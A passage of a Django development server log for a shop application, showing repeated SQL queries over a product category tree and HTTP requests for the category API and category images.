"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:50:05,018 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:50:05,021 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:50:05,023 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:50:05,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:50:05,029 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:50:05,031 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:50:05,033 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:50:05,036 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:50:05,040 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:50:05,042 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:50:05,045 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:50:05,047 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:50:05,049 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:50:05,051 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:50:05,054 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:50:05,056 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:50:05,058 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:50:05,061 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:50:05,063 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:50:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:05] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:50:06] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 06:50:06] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:06] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:06] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:07] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 06:50:07] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:07] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:07] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:07] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:08] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 06:50:09] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:10] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 06:50:11] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 06:50:12,135 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 06:50:12,142 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 06:50:12] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 06:50:12,237 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:50:12,244 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:50:12,248 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:50:12,250 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:50:12,254 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:50:12,258 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:50:12,261 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:50:12,265 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:50:12,269 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:50:12,274 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:50:12,278 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:50:12,282 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:50:12,286 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:50:12,289 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:50:12,295 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:50:12,299 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:50:12,302 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:50:12,306 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:50:12,310 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:50:12,316 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:50:12,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:50:12,323 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:50:12,327 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:50:12,331 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:50:12,335 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:50:12,341 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:50:12,345 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:50:12,348 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:50:12,352 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:50:12,356 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:50:12,361 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:50:12,365 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:50:12,369 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:50:12,373 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:50:12,377 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:50:12,383 utils 4252 140031747061504 (0.001) SELECT 